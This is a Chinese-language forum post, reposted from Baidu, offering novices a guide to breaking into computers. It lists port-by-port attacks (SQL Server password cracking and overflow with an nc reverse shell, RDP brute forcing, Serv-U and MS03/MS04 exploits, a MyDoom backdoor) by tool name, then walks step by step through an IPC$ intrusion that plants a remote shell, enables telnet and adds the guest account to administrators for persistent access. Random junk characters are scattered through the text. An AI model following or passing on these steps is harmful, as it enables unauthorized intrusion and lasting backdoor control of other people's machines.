TA的每日心情 | 衰
2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
/ s" I# [2 c( i' v. d; m& Q希望对新手入侵有帮助!
/ M0 ~/ v/ U# z7 p a 1. 1433端口入侵; Z. g# l3 _/ `, l
scanport.exe 查有1433的机器
% m6 j; R* Y# F% B SQLScanPass.exe 进行字典暴破(字典是关键)1 } R& @, g& o0 w$ g3 W+ k' t4 G
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。4 T" n+ t: W7 u
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口: D( [! Z! f8 w
(以上反向的,测试成功)) z6 E) y/ l5 T ^2 j6 _$ T7 ^
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
Z7 `2 t% d; @) N1 E 2. 4899端口入侵 x" H3 }+ L; y* W' _0 e( l
用4899过滤器.exe,扫描空口令的机器
) t& q$ B( \; D1 v5 w: g' Z 3. 3899的入侵; w# F. x3 J4 Z5 T0 J* s9 j
对很早的机器,可以试试3389的溢出(win3389ex.exe)# r) j0 ~5 e1 B3 H" M1 h7 ]! g$ m
对2000的机器,可以试试字典暴破。(tscrack.exe)
5 i. W/ ]3 G, R 4. 80入侵4 c8 Q8 r- @& ] g5 I. v3 _2 M5 b
对sp3以前的机器,可以用webdav入侵;) q* y' T+ B5 @0 p6 Q
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe); `! [' g1 C" D6 s2 ~; h
可以利用SQL进行注入。(啊D的注入软件)。
/ y L: U5 m @& H# f 5. serv-u入侵(21端口)1 H5 x! F9 z/ m3 w: r S$ g+ E
对5. 004及以下系统,可用溢出入侵。(serv5004.exe). T6 Y5 @9 n. z( [
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
7 \0 \* {+ f7 D7 Y6 i' H 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)3 }) Q I* n; y5 H0 D: z" R
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
4 p$ k& }* {! D; P# A 6. 554端口
) Y2 {9 n4 \$ f6 C2 ]! F* A7 E" Y 用real554.exe入侵。* _) t1 ]( l2 O( c
7. 6129端口
1 p B9 M( Y, b7 l6 | 用DameWare6129.exe入侵。
" |' A! A" m& d' t! u0 j 8. 系统漏洞
8 J, X$ I! x1 A9 ~. L) Y 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。& o* l, C# s0 ]. h: y: d' E8 X
9. 3127等端口) [+ |5 } b3 o# c5 u6 N3 l
1 ?/ z, G0 [+ L+ k1 P) z
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。: x* p: g2 [) H/ H6 v9 A4 Q" L
10. 其他入侵
$ ?+ M7 h; Y" m/ f0 S4 _ 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。5 k) d5 _7 D, L" a0 E o
) a7 R- h6 v( Q- ? S4 A
经典IPC$入侵
: a( t0 ^3 W( W6 N2 r6 G; ~4 d" @. g
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators". z/ ~4 h$ W1 v$ H) p% M
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
& j P) i% w* v2 b. K; J/ Y 2. C:\>copy srv.exe $">\\127.0.0.1\admin$$ `* d Z, q( e- b, y/ u5 h
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
( a0 l" o- E P7 d 3. C:\>net time file://127.0.0.1/
& V+ ~( ~: g( w2 y$ J 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。, h! z' S# O3 r3 p/ O
4. C:\>at file://127.0.0.1/ 11:05 srv.exe5 s1 x1 [2 S/ i. a
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
1 ^% [. W" T, J$ E3 f- ^& \ } 5. C:\>net time file://127.0.0.1/
* V; O7 K- [# y- H2 s" t 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。: T, V( |; V1 w6 D$ h* ?* k
6. C:\>telnet 127.0.0.1 99" n0 y: l3 z8 a4 k5 |% T2 V. `9 S
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
9 F2 v; P: D; ?- A" R7 B 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
. {# g3 w' F7 J8 Q, x2 ]! L* x5 y' u 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
0 e/ [1 J' R. T. C0 z7 l- I2 C 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
1 W m' S! B9 u6 a# E+ f' t/ B 8. C:\WINNT\system32>ntlm0 @# \6 [# U1 e% p7 j$ j6 h+ B
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!' A7 G" o+ @6 _' Y# m! U
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组4 f! {! S: h# _& D9 \% D. C D: x
10. C:\>net user guest /active:yes: f& H* m, `7 `! x: J
将对方的Guest用户激活; M! A& k7 r) e! T( a$ y
11. C:\>net user guest 1234
+ N/ |, {+ D' M; U9 W+ n- e 将Guest的密码改为1234,或者你要设定的密码- d/ N. N9 k* E, B9 X6 i
12. C:\>net localgroup administrators guest /add3 S4 o6 @3 K: C3 V9 Q
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|
晒晒我家乡的“夏花、秋枫、冬雪” 上集
大学毕业证+驾驶证=找工作更容易!经贸学车
916壁虎轮换社青秀山烧烤
:◢▇▇▇▇经贸学院音乐社所有传奇人物②
第五届校运会——开幕式
|版主考核中心|『经贸在线』
( 桂ICP备15001539号-2 ) 
IP卡
狗仔卡
发表于 2009-10-16 03:00:18
收藏
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡